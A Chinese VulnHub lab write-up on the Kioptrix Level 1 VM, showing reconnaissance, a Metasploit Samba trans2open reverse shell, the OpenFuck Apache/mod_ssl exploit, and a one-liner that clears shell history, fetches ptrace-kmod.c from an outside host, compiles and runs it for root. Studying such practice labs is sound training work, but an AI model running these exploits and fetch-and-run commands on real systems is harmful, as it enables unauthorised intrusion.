vulnhub靶机练习之Kioptix Level 1

探测靶机IP

用sudo arp-scan和netdiscover -i eth0都探测不到靶机IP。参考解决方法：将虚拟机文件Kioptix Level 1.vmx的ethernet0.networkName = "Bridged"改成ethernet0.networkName = "Nat"。

靶机IP探测为192.1680.80.15，netdiscover -i eth0的扫描结果：

进一步扫描

我们使用nmap扫描出靶机开放的端口信息如下：

kali@kali:~$ sudo nmap -sS -T5 -Pn 192.168.80.15
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-23 07:20 EST
Nmap scan report for 192.168.80.15
Host is up (0.0017s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
443/tcp  open  https
1024/tcp open  kdm
MAC Address: 00:0C:29:51:2D:92 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.29 seconds

使用nbtscan扫描139端口的netbios-ssn服务

kali@kali:~$ nbtscan 192.168.80.15
Doing NBT name scan for addresses from 192.168.80.15

IP address       NetBIOS Name     Server    User             MAC address      
------------------------------------------------------------------------------
192.168.80.15    KIOPTRIX         <server>  KIOPTRIX         00:00:00:00:00:00

使用msfconsole工具获取信息

什么是Metasploit？
metasploit是一款开源的渗透测试框架软件，也是一个逐步发展与成熟的漏洞研究与渗透代码开发平台。

console的使用
service postgresql start //先连接数据库
msfconsole //打开框架
msf>help //显示msf所支持的命令列表
msf>help search //显示关于search参数的命令和使用
实例入侵metasploitable靶机
1.search samba搜索模块
2.use multi/samba/usermap_script 使用模块
3.show payloads查看可用的载荷
4.set payload cmd/unix/bind_netcat 使用载荷
5.show options 选择载荷可用选项
6.set RHOST 192.168.0.94 设置载荷的攻击目标IP
7.exploit执行渗透攻击
然后攻击成功会建立一个会话，返回一个可交互的shell
这就是使用metasploit渗透的一个常规流程。

对靶机进行metasploit扫描，发现靶机的samba版本是Samba 2.2.1a。我们可以利用该版本的漏洞：Samba Trans2Open Overflow。

kali@kali:~$ msfconsole
[-] ***rting the Metasploit Framework console...|
[-] * WARNING: No database support: No database YAML file
[-] ***
                                                  

     .~+P``````-o+:.                                      -o+:.
.+oooyysyyssyyssyddh++os-`````                        ```````````````          `
+++++++++++++++++++++++sydhyoyso/:.````...`...-///::+ohhyosyyosyy/+om++:ooo///o
++++///////~~~~///////++++++++++++++++ooyysoyysosso+++++++++++++++++++///oossosy
--.`                 .-.-...-////+++++++++++++++////////~~//////++++++++++++///
                                `...............`              `...-/////...`


                                  .::::::::::-.                     .::::::-
                                .hmMMMMMMMMMMNddds\...//M\\.../hddddmMMMMMMNo
                                 :Nm-/NMMMMMMMMMMMMM$$NMMMMm&&MMMMMMMMMMMMMMy
                                 .sm/`-yMMMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMMh`
                                  -Nd`  :MMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMh`
                                   -Nh` .yMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMm/
    `oo/``-hd:  ``                 .sNd  :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMm/
      .yNmMMh//+syysso-``````       -mh` :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMd
    .shMMMMN//dmNMMMMMMMMMMMMs`     `:```-o++++oooo+:/ooooo+:+o+++oooo++/
    `///omh//dMMMMMMMMMMMMMMMN/:::::/+ooso--/ydh//+s+/ossssso:--syN///os:
          /MMMMMMMMMMMMMMMMMMd.     `/++-.-yy/...osydh/-+oo:-`o//...oyodh+
          -hMMmssddd+:dMMmNMMh.     `.-=mmk.//^^^\\.^^`:++:^^o://^^^\\`::
          .sMMmo.    -dMd--:mN/`           ||--X--||          ||--X--||
........../yddy/:...+hmo-...hdd:............\\=v=//............\\=v=//.........
================================================================================
=====================+--------------------------------+=========================
=====================| Session one died of dysentery. |=========================
=====================+--------------------------------+=========================
================================================================================

                     Press ENTER to size up the situation

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: April 25, 1848 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It's always cool in the lab %%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

                        Press SPACE BAR to continue



       =[ metasploit v5.0.71-dev                          ]
+ -- --=[ 1962 exploits - 1095 auxiliary - 336 post       ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.80.15
RHOSTS => 192.168.80.15
msf5 auxiliary(scanner/smb/smb_version) > run

[*] 192.168.80.15:139     - Host could not be identified: Unix (Samba 2.2.1a)
[*] 192.168.80.15:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

利用samba漏洞

这是samba漏洞的详细说明：

About Samba Trans2Open Overflow –
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set. NOTE: Some older versions of RedHat do not seem to be vulnerable since they apparently do not allow anonymous access to IPC.

继续使用metasploit进行漏洞利用：

msf5 auxiliary(scanner/smb/smb_version) > search trans2open #查询这个漏洞

Matching Modules
================

   #  Name                              Disclosure Date  Rank   Check  Description
   -  ----                              ---------------  ----   -----  -----------
   0  exploit/freebsd/samba/trans2open  2003-04-07       great  No     Samba trans2open Overflow (*BSD x86)
   1  exploit/linux/samba/trans2open    2003-04-07       great  No     Samba trans2open Overflow (Linux x86)
   2  exploit/osx/samba/trans2open      2003-04-07       great  No     Samba trans2open Overflow (Mac OS X PPC)
   3  exploit/solaris/samba/trans2open  2003-04-07       great  No     Samba trans2open Overflow (Solaris SPARC)


msf5 auxiliary(scanner/smb/smb_version) > use exploit/linux/samba/trans2open #利用漏洞
msf5 exploit(linux/samba/trans2open) > show options

Module options (exploit/linux/samba/trans2open):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Samba 2.2.x - Bruteforce


msf5 exploit(linux/samba/trans2open) > set RHOST 192.168.80.15 #设置靶机IP
RHOST => 192.168.80.15
msf5 exploit(linux/samba/trans2open) > run #执行漏洞利用

[*] Started reverse TCP handler on 192.168.80.14:4444 
[*] 192.168.80.15:139 - Trying return address 0xbffffdfc...
[*] 192.168.80.15:139 - Trying return address 0xbffffcfc...
[*] 192.168.80.15:139 - Trying return address 0xbffffbfc...
[*] 192.168.80.15:139 - Trying return address 0xbffffafc...
[*] Sending stage (985320 bytes) to 192.168.80.15
[*] 192.168.80.15 - Meterpreter session 1 closed.  Reason: Died
[*] Meterpreter session 1 opened (192.168.80.14:4444 -> 192.168.80.15:1025) at 2020-02-23 07:38:54 -0500
[*] 192.168.80.15:139 - Trying return address 0xbffff9fc...
[*] Sending stage (985320 bytes) to 192.168.80.15
[*] 192.168.80.15 - Meterpreter session 2 closed.  Reason: Died
[*] Meterpreter session 2 opened (127.0.0.1 -> 127.0.0.1) at 2020-02-23 07:38:55 -0500
[*] 192.168.80.15:139 - Trying return address 0xbffff8fc...
[*] Sending stage (985320 bytes) to 192.168.80.15
[*] Meterpreter session 3 opened (192.168.80.14:4444 -> 192.168.80.15:1027) at 2020-02-23 07:38:56 -0500
[*] 192.168.80.15 - Meterpreter session 3 closed.  Reason: Died
[*] 192.168.80.15:139 - Trying return address 0xbffff7fc...
[*] Sending stage (985320 bytes) to 192.168.80.15
[*] Meterpreter session 4 opened (192.168.80.14:4444 -> 192.168.80.15:1028) at 2020-02-23 07:38:58 -0500
[*] 192.168.80.15 - Meterpreter session 4 closed.  Reason: Died

但是，这个Meterpreter session 4 closed. Reason: Died关闭了。这是因为我们使用的是默认攻击载荷linux/x86/meterpreter/reverse_tcp，于是我们重新设置攻击载荷。

msf5 exploit(linux/samba/trans2open) > set payload generic/shell_reverse_tcp #设置载荷
payload => generic/shell_reverse_tcp
msf5 exploit(linux/samba/trans2open) > run #执行漏洞利用

[*] Started reverse TCP handler on 192.168.80.14:4444 
[*] 192.168.80.15:139 - Trying return address 0xbffffdfc...
[*] 192.168.80.15:139 - Trying return address 0xbffffcfc...
[*] 192.168.80.15:139 - Trying return address 0xbffffbfc...
[*] 192.168.80.15:139 - Trying return address 0xbffffafc...
[*] Command shell session 5 opened (192.168.80.14:4444 -> 192.168.80.15:1029) at 2020-02-23 07:41:48 -0500

于是我们获取到了靶机的shell。

输入mail，选择1，查询到制作者的flag信息。

mail
Mail version 8.1 6/6/93.  Type ? for help.
"/var/mail/root": 2 messages 1 new 2 unread
 U  1 root@kioptix.level1   Sat Sep 26 11:42  15/481   "About Level 2"
>N  2 root@kioptrix.level1  Sun Feb 23 07:55  18/524   "LogWatch for kioptrix"
1
Message 1:
From root  Sat Sep 26 11:42:10 2009
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <root@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2

If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...

利用apache漏洞

使用nmap做详细的端口扫描，发现靶机使用的apache版本是Apache/1.3.20。从网上查询，发现这个版本可进行漏洞利用。

kali@kali:~$ sudo nmap -sS -A -n 192.168.80.15
[sudo] password for kali: 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-23 07:57 EST
Nmap scan report for 192.168.80.15
Host is up (0.00093s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2020-02-23T14:00:24+00:00; +1h01m50s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:51:2D:92 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: 1h01m49s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE
HOP RTT     ADDRESS
1   0.93 ms 192.168.80.15

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 128.38 seconds

于是，我们将漏洞利用脚本下载下来：

kali@kali:~$ wget https://www.exploit-db.com/download/764
--2020-02-23 08:07:28--  https://www.exploit-db.com/download/764
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/txt]
Saving to: ‘764’

764                            [  <=>                                  ]  32.94K  78.1KB/s    in 0.4s    

2020-02-23 08:07:33 (78.1 KB/s) - ‘764’ saved [33731]

编译报错，因为攻击机缺少openssl。

kali@kali:/tmp$ sudo gcc -o exploit 764.c -lcrypto
764.c:21:10: fatal error: openssl/ssl.h: No such file or directory
   21 | #include <openssl/ssl.h>
      |          ^~~~~~~~~~~~~~~
compilation terminated.

安装openssl失败：

kali@kali:/tmp$ sudo apt-get install libssl-dev
Reading package lists... Done
Building dependency tree       
Reading state information... Done
E: Unable to locate package libssl-dev

参考解决openssl的安装问题。
~~待续……参考walkthrough：~~
metasploit利用漏洞详细步骤
 apache漏洞利用详细步骤
安装openssl相关组件：apt-get install libssl1.0-dev
运行exp，进入靶机shell：

kali@kali:/tmp$ sudo gcc -o exploit 764.c -lcrypto
kali@kali:/tmp$ ./exploit 0x6b 192.168.80.15 443 -c 40

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
 -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; p://192.168.80.14/ptrace-kmod.c; gcc 
--11:53:36--  http://192.168.80.14/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to 192.168.80.14:80... connected!
HTTP request sent, awaiting response... 404 Not Found
11:53:36 ERROR 404: Not Found.

gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./p: No such file or directory
bash-2.05$ 
bash-2.05$ whoami
whoami
apache

成功获得shell、为什么不是root权限，原因出在ptrace-kmod.c文件中。
~~待续……~~
参考进入shell之后，输入命令：
unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p;

bash-2.05$ unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; 
exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; 
--12:05:40--  http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c [following]
--12:05:47--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
    0K ...                                                   100% @ 678.26 B/s
12:34:16 (678.26 B/s) - `ptrace-kmod.c' saved [3921/3921]
[+] Attached to 1615
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
whoami
root

总结

这个靶机提权，有两种方法入手：一是利用samba溢出漏洞，用metasploit的msfconsole获取靶机shell，二是利用apache漏洞，用metasploit的msfconsole获取靶机shell。
从这个靶机学习的关键知识是，如何使用metasploit工具进行漏洞利用，获取靶机的反弹shell。